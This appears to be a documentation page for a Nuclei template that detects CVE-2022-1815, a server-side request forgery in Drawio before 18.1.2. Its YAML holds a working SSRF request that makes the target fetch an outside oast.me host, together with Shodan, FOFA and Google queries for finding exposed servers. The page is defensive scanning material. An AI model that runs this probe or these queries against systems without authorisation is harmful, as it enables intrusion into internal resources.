Skip to content
Nuclei Templates

Drawio <18.1.2 - Server-Side Request Forgery

ID: CVE-2022-1815

Severity: high

Author: amit-jd

Tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams

Description

Section titled “Description”

Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1815


info:
  name: Drawio <18.1.2 - Server-Side Request Forgery
  author: amit-jd
  severity: high
  description: |
    Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio.  An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.
  remediation: |
    Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability.
  reference:
    - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
    - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
    - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1815
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1815
    cwe-id: CWE-918,CWE-200
    epss-score: 0.02239
    epss-percentile: 0.8954
    cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: diagrams
    product: drawio
    shodan-query: http.title:"flowchart maker"
    fofa-query: title="flowchart maker"
    google-query: intitle:"flowchart maker"
  tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams


http:
  - raw:
      - |
        GET /service/0/test.oast.me HTTP/2
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Interactsh Server')"
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100896a87ca4f6175383162d0e76d78cf619d8b091c62eddc81dedfeaff5efdfb48022000fb11386633bb46e6c52d949bbe39bab508fbfdd69cf41e9817198035b27f79:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1815.yaml"

View on Github